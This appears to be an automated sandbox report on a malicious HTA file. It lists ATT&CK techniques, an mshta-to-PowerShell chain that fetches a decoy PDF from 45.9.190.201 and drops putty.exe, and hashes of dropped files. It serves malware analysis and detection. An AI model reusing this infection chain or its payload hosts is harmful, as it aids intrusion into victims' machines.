Encrypted Channel		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts21
PowerShell		Logon Script (Windows)Logon Script (Windows)1
Software Packing		Security Account Manager1
Account Discovery		SMB/Windows Admin Shares11
Input Capture		Automated Exfiltration2
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
Masquerading		NTDS2
File and Directory Discovery		Distributed Component Object Model12
Clipboard Data		Scheduled Transfer12
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script21
Virtualization/Sandbox Evasion		LSA Secrets25
System Information Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common11
Process Injection		Cached Domain Credentials1
Security Software Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
Process Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem21
Virtualization/Sandbox Evasion		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow11
Application Window Discovery		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
System Owner/User Discovery		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1320936 Sample: a913b6f2499bfbef318b948a278... Startdate: 06/10/2023 Architecture: WINDOWS Score: 92 42 the.earth.li 2->42 52 Malicious sample detected (through community Yara rule) 2->52 54 Antivirus detection for URL or domain 2->54 56 Multi AV Scanner detection for submitted file 2->56 12 mshta.exe 1 2->12         started        signatures3 process4 signatures5 58 Suspicious powershell command line found 12->58 60 Very long command line found 12->60 15 powershell.exe 12 12->15         started        process6 signatures7 62 Very long command line found 15->62 64 Drops PE files to the user root directory 15->64 66 Suspicious command line found 15->66 68 2 other signatures 15->68 18 cmd.exe 1 15->18         started        21 conhost.exe 15->21         started        process8 signatures9 48 Suspicious powershell command line found 18->48 50 Very long command line found 18->50 23 powershell.exe 18 19 18->23         started        27 powershell.exe 15 18->27         started        29 conhost.exe 18->29         started        process10 dnsIp11 44 the.earth.li 93.93.131.124, 49709, 80 MYTHICMythicBeastsLtdGB United Kingdom 23->44 46 45.9.190.201, 49708, 80 AS-HOSTINGERLT Germany 23->46 40 C:\Users\user\putty.exe, PE32 23->40 dropped 31 putty.exe 23->31         started        34 Acrobat.exe 20 56 23->34         started        file12 process13 signatures14 70 Contains functionality to modify clipboard data 31->70 36 AcroCEF.exe 66 34->36         started        process15 process16 38 AcroCEF.exe 4 36->38         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta21%ReversingLabsScript-WScript.Trojan.Valyria
a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta30%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\putty.exe0%ReversingLabs
C:\Users\user\putty.exe2%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://45.9.190.201/Research.pdf0%Avira URL Cloudsafe
http://www.chiark.greenend.org.uk/~sgtatham/putty/1%VirustotalBrowse
http://www.chiark.greenend.org.uk/~sgtatham/putty/PuTTYConfigBoxj0%VirustotalBrowse
http://www.chiark.greenend.org.uk/~sgtatham/putty/PuTTYConfigBoxj0%Avira URL Cloudsafe
http://www.chiark.greenend.org.uk/~sgtatham/putty/0%Avira URL Cloudsafe
http://crl.micro0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
the.earth.li
93.93.131.124
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://45.9.190.201/Research.pdffalse
    • Avira URL Cloud: safe
    		unknown
    http://the.earth.li/~sgtatham/putty/0.63/x86/putty.exefalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1404886400.00000000057E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://www.chiark.greenend.org.uk/~sgtatham/putty/putty.exe, putty.exe, 0000000A.00000000.1459240905.0000000000457000.00000002.00000001.01000000.0000000B.sdmp, putty.exe, 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp, putty.exe.6.drfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://crl.micropowershell.exe, 00000005.00000002.1423096498.0000000007430000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1410247548.0000000004A38000.00000004.00000800.00020000.00000000.sdmptrue
        • URL Reputation: malware
        • URL Reputation: malware
        		unknown
        https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1398594979.0000000004781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410247548.00000000048E1000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1410247548.0000000004A38000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://go.micropowershell.exe, 00000005.00000002.1410247548.0000000004A38000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1404886400.00000000057E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/Licensepowershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://contoso.com/Iconpowershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://www.chiark.greenend.org.uk/~sgtatham/putty/PuTTYConfigBoxjputty.exe, 0000000A.00000000.1459240905.0000000000457000.00000002.00000001.01000000.0000000B.sdmp, putty.exe, 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp, putty.exe.6.drfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1398594979.0000000004781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410247548.00000000048E1000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1410247548.0000000004A38000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  45.9.190.201
                  		unknownGermany
                  		47583AS-HOSTINGERLTfalse
                  93.93.131.124
                  		the.earth.liUnited Kingdom
                  		44684MYTHICMythicBeastsLtdGBfalse

                  General Information

                  Joe Sandbox Version:38.0.0 Ammolite
                  Analysis ID:1320936
                  Start date and time:2023-10-06 15:29:11 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 13s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:19
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample file name:a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta
                  Detection:MAL
                  Classification:mal92.spyw.evad.winHTA@27/30@1/2
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 40
                  • Number of non-executed functions: 214
                  Cookbook Comments:
                  • Found application associated with file extension: .hta

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 162.159.61.3, 172.64.41.3, 184.28.98.93, 184.28.98.83
                  • Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, a122.dscd.akamai.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 4564 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 5292 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  15:30:07API Interceptor2x Sleep call for process: mshta.exe modified
                  15:30:07API Interceptor44x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  93.93.131.124doc.docGet hashmaliciousUnknownBrowse
                  • the.earth.li/~sgtatham/putty/latest/w64/putty.exe
                  lmfao.docGet hashmaliciousUnknownBrowse
                  • the.earth.li/~sgtatham/putty/0.63/x86/pscp.exe

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  the.earth.liclient_1.htaGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  client_3.vbsGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  Informazion.vbsGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  827837hj.xlsGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  doc.docGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.76-installer.msiGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  1mixELaybY.exeGet hashmaliciousvkeyloggerBrowse
                  • 93.93.131.124
                  smphost.dllGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  #U043a#U043d#U043e#U043f#U043a#U0430.xlsmGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  #U043a#U043d#U043e#U043f#U043a#U0430.xlsmGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  #U043a#U043d#U043e#U043f#U043a#U0430.xlsmGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  Microsoft Excel.xlsmGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  Microsoft Excel.xlsmGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  lmfao.docGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  YOeg64zDX4.exeGet hashmaliciousAZORultBrowse
                  • 93.93.131.124
                  payload.exeGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  do7ZLDDsHX.xlsGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  m.docGet hashmaliciousBrowse
                  • 46.43.34.31
                  m.docGet hashmaliciousBrowse
                  • 46.43.34.31
                  m.docGet hashmaliciousBrowse
                  • 46.43.34.31

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  MYTHICMythicBeastsLtdGBclient_1.htaGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  client_3.vbsGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  Informazion.vbsGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  827837hj.xlsGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  7XlWWSA2LU.dllGet hashmaliciousWannacryBrowse
                  • 93.93.132.33
                  section_228_highways_agreement 34377.jsGet hashmaliciousUnknownBrowse
                  • 46.235.226.209
                  dfas_telework_agreement 20731.jsGet hashmaliciousUnknownBrowse
                  • 46.235.226.209
                  private_child_support_agreement_template 17845.jsGet hashmaliciousUnknownBrowse
                  • 46.235.226.209
                  making_a_contract_legally_binding_30040.jsGet hashmaliciousUnknownBrowse
                  • 46.235.226.209
                  illegalargumentexception_comparison_method_violates_its_general_contra 70051.jsGet hashmaliciousUnknownBrowse
                  • 46.235.226.209
                  electrical_contractor_agreement_template 5445.jsGet hashmaliciousUnknownBrowse
                  • 46.235.226.209
                  gootloader_stage1.jsGet hashmaliciousUnknownBrowse
                  • 46.235.226.209
                  difference_between_service_contract_and_employment_contract 98116.jsGet hashmaliciousUnknownBrowse
                  • 46.235.226.209
                  print_scheduling_agreement_sap 4874.jsGet hashmaliciousUnknownBrowse
                  • 46.235.226.209
                  chase_heloc_subordination_form 86327.jsGet hashmaliciousUnknownBrowse
                  • 46.235.226.209
                  doc.docGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.76-installer.msiGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  1mixELaybY.exeGet hashmaliciousvkeyloggerBrowse
                  • 93.93.131.124
                  smphost.dllGet hashmaliciousUnknownBrowse
                  • 93.93.131.124
                  arm7Get hashmaliciousMirai MoobotBrowse
                  • 46.235.224.242
                  AS-HOSTINGERLThttps://www.businesstomark.com/google-sheets-vs-excel-a-comprehensive-face-off/Get hashmaliciousUnknownBrowse
                  • 185.210.145.9
                  Deposit-Confirmation.HtmlGet hashmaliciousHTMLPhisherBrowse
                  • 212.107.17.132
                  BIN.exeGet hashmaliciousRedLine, WSHRATBrowse
                  • 194.59.164.67
                  BUz0FElFiK.exeGet hashmaliciousGlupteba, Lu0Bot, PrivateLoader, RedLine, SmokeLoaderBrowse
                  • 45.130.231.6
                  POWsPohDv9.exeGet hashmaliciousFabookie, PrivateLoader, RedLineBrowse
                  • 45.130.231.6
                  a967rQFLum.exeGet hashmaliciousRedLine, WSHRATBrowse
                  • 194.59.164.67
                  file.exeGet hashmaliciousFabookie, Glupteba, PrivateLoader, RedLine, SmokeLoaderBrowse
                  • 45.130.231.6
                  Somg Salary Update.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 193.46.198.232
                  Salary Update.htmGet hashmaliciousUnknownBrowse
                  • 193.46.198.232
                  https://ymhlto.vitoriaregiabones.com.br/lgZI5Y.ei8jSc/YWRhcnJvd0BzZWNyZXN0ZGFycm93LmNvbQ==Get hashmaliciousUnknownBrowse
                  • 31.170.163.184
                  Sdk283724711.jsGet hashmaliciousWSHRATBrowse
                  • 194.59.164.67
                  255-6887240_Thursday.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 156.67.222.22
                  wp-contentplugins.htaGet hashmaliciousUnknownBrowse
                  • 141.136.41.211
                  Proforma_Invoice.exeGet hashmaliciousFormBookBrowse
                  • 45.130.231.242
                  DHL_Receipt_6015950460.exeGet hashmaliciousFormBookBrowse
                  • 45.130.231.242
                  UPS_CBJ190510700131.exeGet hashmaliciousFormBookBrowse
                  • 45.130.231.242
                  rNO10865687X54-Quote.exeGet hashmaliciousFormBookBrowse
                  • 156.67.211.47
                  http://cgsketchbook.comGet hashmaliciousUnknownBrowse
                  • 141.136.33.45
                  https://cgsketchbook.com/Get hashmaliciousUnknownBrowse
                  • 141.136.33.45
                  https://cgsketchbook.com/Get hashmaliciousUnknownBrowse
                  • 141.136.33.45

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\putty.exe82a7vPjX1R.exeGet hashmaliciousUnknownBrowse
                    cgj6THyKZr.exeGet hashmaliciousUnknownBrowse
                      putty.exeGet hashmaliciousBrowse

                        Created / dropped Files

                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):294
                        Entropy (8bit):5.172903269292124
                        Encrypted:false
                        SSDEEP:6:kw81W0uMq2PCHhJ2nKuAl9OmbnIFUtZ81wPWFZZmwj813AkwOCHhJ2nKuAl9Omb5:kvcfMvBHAahFUtCJZ/o656HAaSJ
                        MD5:1EF61F8F8AA8ECC1E47D757EE499B3F0
                        SHA1:59AC185E80B1875F033E90C9A5C40E46116D1A10
                        SHA-256:C0BFBAB02F5E3EAB7DBFB6C2758637FB7C56A92945FDF34A2BEFD04611070AAB
                        SHA-512:C73350BA14712B4961C8F0FF68EB004182D351F8C1A3A3937BC106270580CDE8E2DCB4BA329F95BAB5601E03A52E2E3319B2FD87878B0A9DFC0B831C132A7D24
                        Malicious:false
                        Preview:2023/10/06-15:30:12.439 1334 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/10/06-15:30:12.443 1334 Recovering log #3.2023/10/06-15:30:12.444 1334 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):294
                        Entropy (8bit):5.172903269292124
                        Encrypted:false
                        SSDEEP:6:kw81W0uMq2PCHhJ2nKuAl9OmbnIFUtZ81wPWFZZmwj813AkwOCHhJ2nKuAl9Omb5:kvcfMvBHAahFUtCJZ/o656HAaSJ
                        MD5:1EF61F8F8AA8ECC1E47D757EE499B3F0
                        SHA1:59AC185E80B1875F033E90C9A5C40E46116D1A10
                        SHA-256:C0BFBAB02F5E3EAB7DBFB6C2758637FB7C56A92945FDF34A2BEFD04611070AAB
                        SHA-512:C73350BA14712B4961C8F0FF68EB004182D351F8C1A3A3937BC106270580CDE8E2DCB4BA329F95BAB5601E03A52E2E3319B2FD87878B0A9DFC0B831C132A7D24
                        Malicious:false
                        Preview:2023/10/06-15:30:12.439 1334 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/10/06-15:30:12.443 1334 Recovering log #3.2023/10/06-15:30:12.444 1334 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):338
                        Entropy (8bit):5.180674083863075
                        Encrypted:false
                        SSDEEP:6:kw83UQO3+q2PCHhJ2nKuAl9Ombzo2jMGIFUtZ83gZZmwj83GO3VkwOCHhJ2nKuAv:kv3UQ7vBHAa8uFUtC3M/o3GS56HAa8RJ
                        MD5:75A58D0B928176856C2203A5568A3F56
                        SHA1:662EB1A9E2C3F20E8B39CB1D8639B79FC1E0FCE0
                        SHA-256:26E3F70756F9BD798575124D084E38A19046B1917D7FB5DB06574D51089C0472
                        SHA-512:6D2CD7473153AC7917CC34D2CC33EC2D3DE849F78EB6240A87E7D67A74D64117DF4DEEEF4C037E5B8E1DD3687BB2425C067D92879F0A5DBB33AFECB16F7B0B47
                        Malicious:false
                        Preview:2023/10/06-15:30:12.615 17c8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2023/10/06-15:30:12.626 17c8 Recovering log #3.2023/10/06-15:30:12.627 17c8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):338
                        Entropy (8bit):5.180674083863075
                        Encrypted:false
                        SSDEEP:6:kw83UQO3+q2PCHhJ2nKuAl9Ombzo2jMGIFUtZ83gZZmwj83GO3VkwOCHhJ2nKuAv:kv3UQ7vBHAa8uFUtC3M/o3GS56HAa8RJ
                        MD5:75A58D0B928176856C2203A5568A3F56
                        SHA1:662EB1A9E2C3F20E8B39CB1D8639B79FC1E0FCE0
                        SHA-256:26E3F70756F9BD798575124D084E38A19046B1917D7FB5DB06574D51089C0472
                        SHA-512:6D2CD7473153AC7917CC34D2CC33EC2D3DE849F78EB6240A87E7D67A74D64117DF4DEEEF4C037E5B8E1DD3687BB2425C067D92879F0A5DBB33AFECB16F7B0B47
                        Malicious:false
                        Preview:2023/10/06-15:30:12.615 17c8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2023/10/06-15:30:12.626 17c8 Recovering log #3.2023/10/06-15:30:12.627 17c8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\2455e1e1-2b8c-41f1-af6a-f6ead7bcb708.tmp

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):443
                        Entropy (8bit):4.963680680732697
                        Encrypted:false
                        SSDEEP:12:YH/um3RA8sqp9WsBd2caq3QYiub6P7E4T3y:Y2sRdss97dJ3QYhbS7nby
                        MD5:F3263785E69E59670A632A7BE2FA66CB
                        SHA1:53D599416DA419651EE082C6D47FD91D339553B4
                        SHA-256:C1257B3032C741BE40C7385B12508DAA0A83A3B776264F426971DAF064559A39
                        SHA-512:3F5A11C3D2C6F2663E704DD0825B71074C4DAD1B43D59FA0D8FEF5FC79A2ACC3A5A984C654A26C530B7978F090C9268029A91DDA1265855E0190770D71838132
                        Malicious:false
                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341159018430278","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):443
                        Entropy (8bit):4.963680680732697
                        Encrypted:false
                        SSDEEP:12:YH/um3RA8sqp9WsBd2caq3QYiub6P7E4T3y:Y2sRdss97dJ3QYhbS7nby
                        MD5:F3263785E69E59670A632A7BE2FA66CB
                        SHA1:53D599416DA419651EE082C6D47FD91D339553B4
                        SHA-256:C1257B3032C741BE40C7385B12508DAA0A83A3B776264F426971DAF064559A39
                        SHA-512:3F5A11C3D2C6F2663E704DD0825B71074C4DAD1B43D59FA0D8FEF5FC79A2ACC3A5A984C654A26C530B7978F090C9268029A91DDA1265855E0190770D71838132
                        Malicious:false
                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341159018430278","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3758
                        Entropy (8bit):5.23569418637398
                        Encrypted:false
                        SSDEEP:96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+b59ulp:S43C4mS7fFi0KFYDjr3LWO3V3aw+b59u
                        MD5:D13474303B0C55E7763896143D52E12A
                        SHA1:61F460C4DB05839D78E736DFFEABB20151B73D27
                        SHA-256:F9B000D0E34BC7F189E719AD0226E7DF161776823DDA53D47448A1FFB4DD23C0
                        SHA-512:E8C4E99782E9536ED534EE1D39EB252C658CD7363A3A7E5F85811BC39202C52EA3E12768EDD4554A93F17880010AFB47DE04D1E262E4B96251C2E12FDF1B3CCD
                        Malicious:false
                        Preview:*...#................version.1..namespace-8..|o................next-map-id.1.Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/.0...dr................next-map-id.2.Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.2.$..o................next-map-id.4.Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/.3+...^...............Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/....^...............Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/T.3.a...............Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.U..a...............Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.$..o................next-map-id.5.Pnamespace-c66013b9_73b6_4b3f_b279_

                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                        Download File
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):326
                        Entropy (8bit):5.228348841997223
                        Encrypted:false
                        SSDEEP:6:kw83cQ+q2PCHhJ2nKuAl9OmbzNMxIFUtZ83cCKXZmwj83cmNVkwOCHhJ2nKuAl9c:kv3cVvBHAa8jFUtC3cCKX/o3cu56HAab
                        MD5:B855BA5629E9844F22DFDF9771613E9A
                        SHA1:98C3343681CC7048C5C3B101F33664790E1A1A80
                        SHA-256:4B48E7D66FFDBE5BD43D9FFD5A90B22B86E7CCD3507630FD43DF9504192D69C3
                        SHA-512:6D52087EB945BB244B30B2E87A0B5EF2F9C6317DCF05D2C97CD859402968CA1B9A2EB2BE9B9F61AF861334C6E95A9CAB2382E551C2FEA7B99F4E44EDE1421C5D
                        Malicious:false
